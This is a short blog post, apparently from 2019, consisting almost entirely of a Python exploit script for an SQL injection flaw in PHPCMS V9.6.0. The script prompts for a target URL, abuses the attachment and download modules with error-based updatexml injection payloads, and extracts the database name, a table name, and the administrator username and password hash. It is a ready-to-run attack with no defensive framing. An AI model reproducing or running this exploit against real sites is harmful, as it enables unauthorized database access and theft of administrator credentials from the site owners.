PHPCMS V9.6.0 SQL注入漏洞EXP

运行于python3.5

import requests
import time
import re
import sys

def banner():
	msg = '''--------------EXP IS PHPCMS V9.6.0---------------'''
	print(msg)
def get_encrypt_value(payload,url):
	url_com = url + payload
	url_1 = "{}/index.php?m=wap&a=index&siteid=1".format(url)
	cookies = requests.get(url_1).cookies
	for c in cookies:
		if c.name[-7:]=='_siteid':
			cookie_head=c.name[:6]
			cookies[cookie_head + '_userid']=c.value
			cookies[c.name]=c.value
			break
	encrypt_cookie = requests.get(url_com,cookies=cookies).cookies
	for c in encrypt_cookie:
		if c.name[-9:] == '_att_json':
			encrypt_data = c.value
			break
	return get_data(url,encrypt_data)
def get_data(url,data):
	url = "{}/index.php?m=content&c=down&a_k={}".format(url,data)
	rsp = requests.get(url)
	cc = re.findall(r"XPATH syntax error: '~(.*?)~' <br />",rsp.text)
	return cc
def get_payload(url):
	data = []
	try:
		payload_db_name = {"db_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20database%28%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
		db_name = get_encrypt_value(payload_db_name.get('db_name'),url)
		db_name = db_name[0]
		data.append(db_name)
	except:
		str = "***"
		data.append(str)
	try:
		payload_table_name = {"table_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20table_name%*20from%*20information_schema.tables%*20where%*20table_schema%3D%*27"+db_name+"%*27%*20limit%*200%2C1%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
		table_name = get_encrypt_value(payload_table_name.get('table_name'),url)
		table_name = table_name[0]
		data.append(table_name)
	except:
		str = "***"
		data.append(str)
	try:
		payload_admin_name = {"admin_name":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20username%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C1%2C16%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
		admin_name = get_encrypt_value(payload_admin_name.get('admin_name'),url)
		admin_name = admin_name[0]
		data.append(admin_name)
	except:
		str = "***"
		data.append(str)
	try:
		payload_pass_s16 = {"pass_s16":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20password%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C1%2C16%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
		pass_s16 = get_encrypt_value(payload_pass_s16.get('pass_s16'),url)
		pass_s16 = pass_s16[0]
	except:
		pass
	try:
		payload_pass_x16 = {"pass_x16":"/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20mid%28%28SELECT%*20password%*20from%*20"+table_name+"%*20limit%*200%2C1%29%2C16%2C20%29%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1"}
		pass_x16 = get_encrypt_value(payload_pass_x16.get('pass_x16'),url)
		pass_x16 = pass_x16[0]
		password = pass_s16 + pass_x16
		data.append(password)
	except:
		str = "***"
		data.append(str)
	output_data(data)
def output_data(data):
	output = '''
		database name is : {0}
		table name is : {1}
		admin username is : {2}
		admin password is : {3}
	'''.format(data[0],data[1],data[2],data[3])
	print(output)
def get_url():
	url = input("Please input url:")
	if ("http://"in url) or ("https://" is url):
		return url
	else:
		print("Warning: Please input http:// or https:// ! try again !")
def main():
	banner()
	url = get_url()
	print("[*] target:{}".format(url))
	get_payload(url)
	print("[*] shutting down at {0}".format(time.strftime("%X")))
if __name__ == '__main__':
	main()

  

posted @ 2019-05-10 15:48  Spec·  阅读(2053)  评论(0编辑  收藏  举报